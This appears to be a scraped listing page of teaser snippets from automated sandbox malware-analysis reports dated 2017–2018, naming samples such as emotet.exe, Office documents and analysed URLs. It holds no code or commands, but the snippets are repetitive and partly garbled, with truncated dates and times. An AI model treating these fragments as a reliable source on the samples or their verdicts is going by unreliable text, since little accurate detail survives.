ID: Cookbook: browseurl.jbs Time: 22:12:09 Date: 17/11/2017 Version: ID: 37366 Cookbook: browseurl.jbs Time: 22:12:09 Date: 17/11/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Sample Name: Unconfirmed crdownload Cookbook: default.jbs Time: 22:58:07 Date: 08/11/2017 Version:

ID: Sample Name: Unconfirmed crdownload Cookbook: default.jbs Time: 22:58:07 Date: 08/11/2017 Version: ID: 80 Sample Name: Unconfirmed.crdownload Cookbook: default.jbs Time: 22:8:0 Date: 08/11/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection

More information

ID: Sample Name: binarydata Cookbook: default.jbs Time: 22:09:57 Date: 22/11/2017 Version:

ID: Sample Name: binarydata Cookbook: default.jbs Time: 22:09:57 Date: 22/11/2017 Version: ID: 88 Sample Name: binarydata Cookbook: default.jbs Time: 22:09: Date: 22/11/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification

More information

ID: Sample Name: Liste1.jar Cookbook: default.jbs Time: 23:20:23 Date: 02/11/2017 Version:

ID: Sample Name: Liste1.jar Cookbook: default.jbs Time: 23:20:23 Date: 02/11/2017 Version: ID: 35936 Sample Name: Liste1.jar Cookbook: default.jbs Time: 23:20:23 Date: 02/11/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Sample Name:._k.php Cookbook: default.jbs Time: 05:41:18 Date: 25/04/2018 Version:

ID: Sample Name:._k.php Cookbook: default.jbs Time: 05:41:18 Date: 25/04/2018 Version: ID: 2 Sample Name:._k.php Cookbook: default.jbs Time: 0:41:1 Date: 2/04/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification

More information

ID: Sample Name: SSB SBV Daily Report - Logistics Template DEC '17 (8).xlsm Cookbook: defaultwindowsofficecookbook.jbs Time: 06:35:29 Date:

ID: Sample Name: SSB SBV Daily Report - Logistics Template DEC '17 (8).xlsm Cookbook: defaultwindowsofficecookbook.jbs Time: 06:35:29 Date: ID: 41310 Sample Name: SSB SBV Daily Report - Logistics Template DEC '17 (8).xlsm Cookbook: defaultwindowsofficecookbook.jbs Time: 06:35:29 Date: 31/12/2017 Version: 20.0.0 Table of Contents Analysis Report

More information

ID: Cookbook: urldownload.jbs Time: 23:23:00 Date: 11/01/2018 Version:

ID: Cookbook: urldownload.jbs Time: 23:23:00 Date: 11/01/2018 Version: ID: 42417 Cookbook: urldownload.jbs Time: 23:23:00 Date: 11/01/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Signature

More information

ID: Sample Name: New invoice doc Cookbook: defaultwindowsofficecookbook.jbs Time: 21:49:06 Date: 07/11/2017 Version: 20.0.

ID: Sample Name: New invoice doc Cookbook: defaultwindowsofficecookbook.jbs Time: 21:49:06 Date: 07/11/2017 Version: 20.0. ID: 36381 Sample Name: New invoice 1385371761.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 21:4:06 Date: 07/11/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview

More information

ID: Cookbook: browseurl.jbs Time: 18:05:31 Date: 26/12/2017 Version:

ID: Cookbook: browseurl.jbs Time: 18:05:31 Date: 26/12/2017 Version: ID: 41000 Cookbook: browseurl.jbs Time: 1:05:31 Date: 26/12/2017 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Cookbook: browseurl.jbs Time: 20:04:11 Date: 14/06/2018 Version:

ID: Cookbook: browseurl.jbs Time: 20:04:11 Date: 14/06/2018 Version: ID: 64085 Cookbook: browseurl.jbs Time: 20:04:11 Date: 14/06/2018 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Cookbook: browseurl.jbs Time: 18:45:10 Date: 08/10/2018 Version: Fire Opal

ID: Cookbook: browseurl.jbs Time: 18:45:10 Date: 08/10/2018 Version: Fire Opal ID: 82913 Cookbook: browseurl.jbs Time: 18:45:10 Date: 08/10/2018 Version: 24.0.0 Fire Opal Table of Contents Table of Contents Analysis Report http://www.learningtoolkit.club Overview General Information

More information

ID: Sample Name: 29UPDYATHD.exe Cookbook: default.jbs Time: 19:03:31 Date: 06/04/2018 Version:

ID: Sample Name: 29UPDYATHD.exe Cookbook: default.jbs Time: 19:03:31 Date: 06/04/2018 Version: ID: 5352 Sample Name: 29UPDYATHD.exe Cookbook: default.jbs Time: 19:03:31 Date: 06/04/201 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Cookbook: browseurl.jbs Time: 23:36:16 Date: 10/04/2018 Version:

ID: Cookbook: browseurl.jbs Time: 23:36:16 Date: 10/04/2018 Version: ID: 54075 Cookbook: browseurl.jbs Time: 23:36:16 Date: 10/04/2018 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Sample Name: emotet.exe Cookbook: defaultwindowsofficecookbook.jbs Time: 07:07:14 Date: 07/11/2017 Version:

ID: Sample Name: emotet.exe Cookbook: defaultwindowsofficecookbook.jbs Time: 07:07:14 Date: 07/11/2017 Version: ID: 3626 Sample Name: emotet.exe Cookbook: defaultwindowsofficecookbook.jbs Time: 0:0:14 Date: 0/11/201 Version: 20.0.0 Table of Contents Table of Contents Analysis Report Overview Information Detection

More information

ID: Cookbook: browseurl.jbs Time: 00:46:14 Date: 03/07/2018 Version:

ID: Cookbook: browseurl.jbs Time: 00:46:14 Date: 03/07/2018 Version: ID: 66523 Cookbook: browseurl.jbs Time: 00:46:14 Date: 03/07/2018 Version: 23.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis

More information

ID: Sample Name: MobaXterm_installer_10.5.msi Cookbook: defaultwindowsmsicookbook.jbs Time: 18:29:36 Date: 25/05/2018 Version: 22.0.

ID: Sample Name: MobaXterm_installer_10.5.msi Cookbook: defaultwindowsmsicookbook.jbs Time: 18:29:36 Date: 25/05/2018 Version: 22.0. ID: 61258 Sample Name: MobaXterm_installer_10.5.msi Cookbook: defaultwindowsmsicookbook.jbs Time: 18:29:36 Date: 25/05/2018 Version: 22.0.0 Table of Contents Analysis Report Overview Information Detection

More information

ID: Sample Name: paint.net install.exe Cookbook: default.jbs Time: 00:46:01 Date: 01/12/2017 Version:

ID: Sample Name: paint.net install.exe Cookbook: default.jbs Time: 00:46:01 Date: 01/12/2017 Version: ID: 38812 Sample Name: paint.net.4.0.19.install.exe Cookbook: default.jbs Time: 00:46:01 Date: 01/12/2017 Version: 20.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Sample Name: CRP_Force_Tool.exe Cookbook: default.jbs Time: 20:11:41 Date: 20/07/2018 Version:

ID: Sample Name: CRP_Force_Tool.exe Cookbook: default.jbs Time: 20:11:41 Date: 20/07/2018 Version: ID: 699 Sample Name: CRP_Force_Tool.exe Cookbook: default.jbs Time: 20:11:41 Date: 20/0/201 Version: 23.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection Confidence

More information

ID: Cookbook: browseurl.jbs Time: 15:26:33 Date: 16/03/2018 Version:

ID: Cookbook: browseurl.jbs Time: 15:26:33 Date: 16/03/2018 Version: ID: 50608 Cookbook: browseurl.jbs Time: 15:26:33 Date: 16/03/2018 Version: 22.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Cookbook: browseurl.jbs Time: 14:05:23 Date: 30/07/2018 Version:

ID: Cookbook: browseurl.jbs Time: 14:05:23 Date: 30/07/2018 Version: ID: 70096 Cookbook: browseurl.jbs Time: 14:05:23 Date: 30/07/2018 Version: 23.0.0 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature

More information

ID: Sample Name: INDUSTRIAL.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 02:35:30 Date: 25/04/2018 Version: 22.0.

ID: Sample Name: INDUSTRIAL.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 02:35:30 Date: 25/04/2018 Version: 22.0. ID: 56519 Sample Name: 20180542 INDUSTRIAL.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 02:35:30 Date: 25/04/2018 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview Information

More information

ID: Sample Name: promo_50_ iqy Cookbook: default.jbs Time: 15:01:30 Date: 07/06/2018 Version:

ID: Sample Name: promo_50_ iqy Cookbook: default.jbs Time: 15:01:30 Date: 07/06/2018 Version: ID: 63041 Sample Name: promo_50_57443456.iqy Cookbook: default.jbs Time: 15:01:30 Date: 07/06/2018 Version: 22.0.0 Table of Contents Table of Contents Analysis Report Overview Information Detection Confidence

More information

ID: Cookbook: browseurl.jbs Time: 20:07:43 Date: 27/09/2018 Version:

ID: Cookbook: browseurl.jbs Time: 20:07:43 Date: 27/09/2018 Version: ID: 80599 Cookbook: browseurl.jbs Time: 20:07:43 Date: 27/09/2018 Version: 23.0.0 Table of Contents Table of Contents Analysis Report http://www.qbproadvisorshelp.com Overview General Information Detection

More information

ID: Sample Name: DOCS.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 16:07:38 Date: 06/02/2018 Version:

ID: Sample Name: DOCS.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 16:07:38 Date: 06/02/2018 Version: ID: 45263 Sample Name: DOCS.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 16:07:38 Date: 06/02/2018 Version: 20.0.0 Table of Contents Analysis Report Overview Information Detection Confidence Classification

More information

ID: Sample Name: _ doc Cookbook: defaultwindowsofficecookbook.jbs Time: 14:23:56 Date: 20/10/2017 Version: 20.0.

ID: Sample Name: _ doc Cookbook: defaultwindowsofficecookbook.jbs Time: 14:23:56 Date: 20/10/2017 Version: 20.0. ID: 34737 Sample Name: 20170927_655387.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 14:23:56 Date: 20/10/2017 Version: 20.0.0 Table of Contents Analysis Report Overview Information Detection Confidence

More information